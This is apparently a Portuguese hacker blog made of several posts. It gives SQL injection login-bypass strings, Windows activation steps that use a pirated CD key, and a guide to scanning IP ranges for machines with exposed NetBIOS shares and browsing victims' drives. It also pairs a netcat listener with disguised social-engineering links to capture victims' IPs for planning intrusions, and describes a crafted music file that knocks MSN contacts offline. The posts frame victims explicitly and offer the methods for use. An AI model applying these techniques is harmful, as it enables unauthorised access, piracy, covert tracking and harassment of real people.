Criatividade sem limites !!!

Olá galera,

segue o link da vídeo aula

BAIXAR O VÍDEO

Apenas para conhecimento e estudos

Algumas principais strings
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin ' - -
' ou 0=0 --
"ou 0=0 --
ou 0=0 --
' ou 0=0 #
"ou 0=0 #
ou 0=0 #
' ou ' x'='x
"ou" x"="x
') ou (' x'='x
' ou 1=1 --
"ou 1=1 --
ou 1=1 --
' ou a=a --
"ou" a"="a
') ou (' a'='a
") ou ("a"="a
hi "ou" a"="a
hi "ou 1=1 --
hi ' ou 1=1 --
hi ' ou ' a'='a
hi ') ou (' a'='a
hi") ou ("a"="a

Qualquer dúvidas é só postar.
Abraços,
D3D0S.

Validar Windows como Original

1. Vá em Iniciar > Executar

2. Digite regedit e clique em OK.

3. Já dentro do regedit, navegue até a chave:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\WindowsNT\CurrentVersion\WPAEvents

4. No painel í direita, clique duas vezes em OOBETimer

5. Na janela que foi aberta, apague qualquer valor e clique em OK. Feche o regedit

6. Vá novamente em Iniciar > Executar e dessa vez digite:
%systemroot%\system32\oobe\msoobe.exe /a

7. Na janela que foi aberta, escolha a opção Sim, desejo telefonar…

8. Na próxima etapa, clique no botão Alterar chave de produto.

9. Na etapa seguinte, digite a CD-Key:
THMPV-77D6F-94376-8HGKG-VRDRQ
e clique no botão Atualizar

10. Após clicar no botão Atualizar, o assistente para ativação voltará para a janela anterior, então, clique em Lembrar mais tarde e reinicie o Windows.

11. Reiniciado o Windows vá novamente em Iniciar > Executar e digite:
%systemroot%\system32\oobe\msoobe.exe /a

12. Aparecerá a seguinte mensagem:

Ativação do Windows
O Windows já está ativado. Clique em OK para sair.

Pronto! Windows validado com sucesso!

Objetivo: Explorar falhas no protocolo Netbios

1 - o primeiro passo é arrumar um bom scanner de portas. Qualquer um serve mas para essa tarefa especifica eu utilizo o ADVANCED LAN SCANNER...
Com esse scanner vc visualizara portas apertas nos servidores alem de nomes netbios(nosso objetivo)
2 - escolhe uma faixa de Ip para scanner ( Ex 200.233.73.1-200.233.73.255
3 - Verifica quais dos hosts encontrados estão ativos ( aparecera ao lado do Ip " logger in")
4 - dentre os ativos vc verifica as portas abertas... mas agora vamos nos concentrar apenas no disco c da vitima
5 - vc deverá encontrar maquinas que tenham os nomes netbios à mostra... encontrando uma maquina com nomes netbios expostos... anota o nome netbios do File Serve Service - (servidor de arquivos!)
5 - feito isso vc deve abrir o ms-dos e usar o seguinte comando NBTSTAT -A [IP DA VITIMA]
a vitima deve ter as postas 21 e 23 abertas
com o nbtstat aberto depois de ter encontrado o host...
vai no menu iniciar... clica em execultar
insere lá... "\\(NOME NETBIOS DO COMPUTADOR"
clica execultar e pronto...
vc estara no Disco Rígido da vítima.. aí vc faz o que quiser... sob sua responsabilidade...
Fonte desconhecida

Assistente de controles => access.cpl
Assistente de acessibilidade => accwiz
Adicionar novo hardware => hdwwiz.cpl
Adicionar/Remover programas => appwiz.cpl
Ferramentas Admnistrativas => control admintools
Adobe Acrobat (Executar se instalado ) => acrobat
Adobe Designer (Executar se instalado ) => acrodist
Adobe Distiller (Executar se instalado ) => acrodist
Adobe ImageReady (Executar se instalado ) => imageready
Adobe Photoshop (Executar se instalado ) => photoshop
Atualizações automáticas => wuaucpl.cpl
Assistente para transferência BlueTooth => fsquirt
Calculadora => calc
Gerenciador de Certeficados => certmgr.msc
Mapa de caracteres => charmap
Check Disk Utility => chkdsk
Visualizador da área de armazenamento => clipbrd
Janela de comandos DOS => cmd
Serviços de Componentes => dcomcnfg
Gerenciamento do computador => compmgmt.msc
Painel de Controle => control
Propriedades de data e tempo => timedate.cpl
DDE Shares => ddeshare
Gerenciamento de dispositivos => devmgmt.msc
Direct X Control Panel (Se instalado )* => directx.cpl
Direct X Troubleshooter => dxdiag
Limpeza de Disco => cleanmgr
Desfragmentador de Discos => dfrg.msc
Gerenciamento de Discos => diskmgmt.msc
Gerenciamento de partição de Discos => diskpart
Propriedades de Ví­deo => control desktop
Propriedades de Ví­deo => desk.cpl
Propriedades de Ví­deo (aparência) => control color
Dr. Watson System Troubleshooting Utility => drwtsn32
Driver Verifier Utility => verifier
Event Viewer => eventvwr.msc
Assistente para transferência de arquivos e informações => migwiz
Verificação de assinatura de arquivo => sigverif
Busca rápida => findfast.cpl
Firefox (Executar se instalado ) => firefox
Propriedades de pasas => control folders
Fonts => control fonts
Fonts (Pasta) => fonts
Jogo FreeCell => freecell
Controle para Jogos => joy.cpl
Group Policy Editor (XP Prof) => gpedit.msc
Jogo de cartas => mshearts
Ajuda e suporte => helpctr
HyperTerminal => hypertrm
Iexpress Wizard => iexpress
Indexing Service => ciadv.msc
Internet Connection Wizard => icwconn1
Internet Explorer => iexplore
Propriedades da Internet => inetcpl.cpl
Suporte a Configurações da Internet => inetwiz
Configuração de protocolo de Internet( Visualizar tudo) => ipconfig /all
Configuração de protocolo de Internet(Visualizar DNS ) => ipconfig /displaydns
Configuração de protocolo de Internet (Deletar informações de DNS ) => ipconfig /flushdns
Configuração de protocolo de Internet (Todas as conexões ) => ipconfig /release
IP Configuration (Renovar Conexões ) => ipconfig /renew
IP Configuration (Atualizar DHCP & Re-Registers DNS) => ipconfig /registerdns
IP Configuration (Visualizar DHCP Class ID) => ipconfig /showclassid
IP Configuration (Modificar DHCP Class ID) => ipconfig /setclassid
Painel de controle Java (Executar se instalado ) => jpicpl32.cpl
Painel de controle Java (Executar se instalado ) => javaws
Propriedades do teclado => control keyboard
Configurações de segurança => secpol.msc
Usuários e Grupos locais => lusrmgr.msc
Fazer Logoff do Windows => logoff
Software para retirar Malware´s (fraco) => mrt
Microsoft Access (Executar se instalado ) => access.cpl
Microsoft Chat (Bate-papo, alguém usa isso? ) => winchat
Microsoft Excel (Executar se instalado ) => excel
Microsoft Frontpage (Executar se instalado ) => frontpg
Microsoft Movie Maker (Ferramenta para edição de filmes caseiros) => moviemk
Microsoft Paint (Famoso Paint Brushe ) => mspaint
Microsoft Powerpoint (Executar se instalado ) => powerpnt
Microsoft Word (Executar se instalado ) => winword
Ferramenta para Sincornização => mobsync
Minesweeper Game (Jogo " Mina ") => winmine
Propriedades do Mouse => control mouse
Propriedades do Mouse => main.cpl
Nero (Executar se instalado ) => nero
Netmeeting (Sofwtare para comunicação, utilizado geralmente em empresas de pequeno porte ) => conf
Conexões de rede => control netconnections
Conexões de rede => ncpa.cpl
Setupe de Conexões de rede => netsetup.cpl
Bloco de notas => notepad
Nview Desktop Manager (Executar se instalado ) => nvtuicpl.cpl
Gerenciador de Objetos => packager
Administrador de fontes de dados ODBC => odbccp32.cpl
Teclado virtual => osk
Opens AC3 Filter (Executar se instalado ) => ac3filter.cpl
Outlook Express => msimn
Paint => pbrush
Propriedades de senha => password.cpl
Ajustar Monitor => perfmon.msc
Ajustar Monitor => perfmon
Opções de telefone e modem => telephon.cpl
Discador => dialer
Pinball Game => pinball
Propriedades de opções de energia => powercfg.cpl
Impressoras e Faxes => control printers
Pasta de impressoras => printers
Editor de characteres particulares (algíºem conhece isso?) => eudcedit
Quicktime (Se instalado ) => QuickTime.cpl
Quicktime Player (Se instalado executar o Quick Time ) => quicktimeplayer
Real Player (Se instalado Executar o Real player ) => realplay
Configurações regionais => intl.cpl
Editor de Registros => regedit
Editor de Registros => regedit32
Catalogo Telefonico => rasphone
Conectar a Desktop Remoto através de um Host ou IP => mstsc
Armazenamento removí­vel => ntmsmgr.msc
Solicitação do operador de armazenamento removí­vel => ntmsoprq.msc
Consulta de diretivas resultantes => rsop.msc
Assistente de Cameras e Scanners => sticpl.cpl
Tarefas Agendadas => control schedtasks
Centro de segurança do Windows => wscui.cpl
Serviços => services.msc
Arquivos compartilhados => fsmgmt.msc
Desligar => shutdown
Som e áudio => mmsys.cpl
Solitário (Jogo) => spider
SQL Client Configuration => cliconfg
System Configuration Editor => sysedit
System Configuration Utility => msconfig
System File Checker Utility (Scan Immediately) => sfc /scannow
System File Checker Utility (Scan Once At Next Boot) => sfc /scanonce
System File Checker Utility (Scan On Every Boot) => sfc /scanboot
System File Checker Utility (Return to Default Setting) => sfc /revert
System File Checker Utility (Purge File Cache) => sfc /purgecache
System File Checker Utility (Set Cache Size to size x) => sfc /cachesize=x
System Information => msinfo32
System Properties => sysdm.cpl
Task Manager => taskmgr
TCP Tester => tcptest
Telnet Client(Executar Telnet) => telnet
Tweak UI (Se instalado ) => tweakui
User Account Management (Controlar Contas de usuário ) => nusrmgr.cpl
Utility Manager => utilman
Windows Address Book (Serviço para guardar lista de contatos ) => wab
Windows Address Book Import Utility (Serviço para importar lista de contatos) => wabmig
Windows Backup Utility (Fazer Backup ) => ntbackup
Windows Explorer (Executar Explorer) => explorer
Windows Firewall (Executar Firewall) => firewall.cpl
Windows Magnifier => magnify
Windows Management Infrastructure => wmimgmt.msc
Windows Media Player (Executar Media player ) => wmplayer
Windows Messenger (Executar MSN) => msmsgs
Windows Picture Import Wizard (Precisa estar com a camera instalada ) => wiaacmgr
Windows System Security Tool (ferramenta de segurança do windows ) => syskey
Windows Update Launches (ver updates ) => wupdmgr
Windows Version (Ver a versão do Windows ) => winver
Windows XP Tour Wizard (Tour Windows) => tourstart
Wordpad => write

Não é a toa que o netcat é considerado um canivete suiço, é possível praticamente fazer qualquer coisa com ele como:scanner de portas, servidor de web simples,back-orifice com ou sem conexão reversa,sniffer, terminal de telnet e ftp, transferência de arquivos e etc ...

No nosso caso vamos usá-lo como um Honey Pote ( Pote de Mel ), simularemos um servidor de web falso com única intenção de capturar o ips de nossas vítimas, infelizmente essa técnica requer que você forneça seu ip para vítima, visto que um servidor de web funciona dessa maneira , já que para você visitar um site é necessário saber o ip ou a url para acessar os dados ...

Explicação dos parametros do netcat:

nc -vv -L -p 80 >> ips_pego.txt

nc= executa o netcat

-vv=coloca o netcat em modo verbo, detalhando tudo o que ocorre na tela para que o operador possa ver o que acontence

-L=deixa o netcat em modo de escuta, aguardando uma conexão de um cliente e quando essa conexão cair e fica novamente aguardando outra conexão

-p 80 = abre a porta 80 de sua máquina ( porta padrão de servidores de web)

>>ips_pego.txt= todas as conexões de clientes ficaram gravadas neste arquivo , se o arquivo não existir ele será criado, se existir novas informações serão acrescentadas no final do arquivo e assim sucessivamente ...

Neste caso o servidor já está rodando e agora só falta procurar as vítimas, para isso é preciso usar um pouco de engenharia social , usando links falsos no msn,fórum, ircs e etc, ou simplesmente pedindo para que uma pessoa digite em seu browser a url :

http://seu_ip ---------->Seu ip como um servidor falso !!!

Exemplo de links falsos :

Usando links máscarados, dependendo da plataforma que você está se comunicando para camuflar um pouco seu ip e seduzir a vítima entrar falando que é um site legal como no exemplo abaixo :

Código em HTML:
www.supersexolandia.com.br

Código em BBCODE:
www.supersexolandia.com.br -->passe o mouse no link e veja em baixo na barra de seu browser que não tem nada a haver com o link descrito, mostaria o ip do servidor falso"Meu_ip" e não http://www.supersexolandia.com.br !

Código em Wike:
[http://Meu_ip http://www.supersexolandia.com.br]

Depois de seduzido nossa vitima vai em seu browser e digita o a url http://meu_ip ou clica no link máscarado como no exemplo:

Não acontece nada a página fica tentando carregar e dá uma mensagem que não foi possível abrir a conexão , então a pessoa fala que o link é quebrado que não está conseguindo acessar, então você como um bom engenheiro social inventa uma desculpa ...

Colhendo os frutos !!!

Vá na pasta onde está os arquivos de execução do netcat (nc.exe) e procure o arquivo ips_pego.txt e abre com um processador de textos qualquer como "bloco de notas", "Wordpad","World" etc .

Mostra o ip do cliente conectado na linha Host, o tipo de Sistema operacional neste caso da familia Windows NT e sua versão, mostra o tipo de browser neste caso o firefox na versão 2.0.0.11 em ingles e outras informações que já poderia ser um começo para planejar uma invasão ...

Observações: Para essa técnica funcionar a sua máquina tem que estar conectada diretamente com internet como linha discada ou modem da speedy business, se você estiver atrás de um roteador terá que usar a técnica do NOIP para fazer o roteamento de seu HOST, lembrando que se você estiver usando firewall também terá que dar acesso para que o netcat abra as portas livremente
Também vale lembrar que existe outras técnicas como o uso do comando netstat -n quando estamos fazendo uma conexão direta com a vítima no msn , por exemplo ela fazendo o download de algum arquivo compartilhado por você, e que da mesma maneira que dá para você ver o ip da vítima , também dá para ela saber o seu usando o mesmo recurso ...

Vamos lá..

Peguem uma música qualquer, e entre nas propriedades do arquivo.

Vá em Resumo > Avançado, e preencha todas as tags (ou só autor e título, tanto faz) com "quadradinhos", apertando Ctrl+Backspace (tecla em cima do Enter). Mande Aplicar e saia.

Mande para aquele contato que gosta de exibir a música que está ouvindo.

Assim que ele tocar, IRÁ CAIR DO MSN! E NÃO VAI CONSEGUIR RECONECTAR ATÉ PARAR A MÚSICA!!

SEM VÍRUS, SEM PROGRAMAS, APENAS UMA MÚSICA COM TAGS EDITADAS!!!

Qualquer dúvida só postar !!!!!!
Abraços
D3D0S

Criado o novo blog em 2008 para facilitar a vida dos profissionais em geral de informática...

Espero que seja útil para sua vida profissional.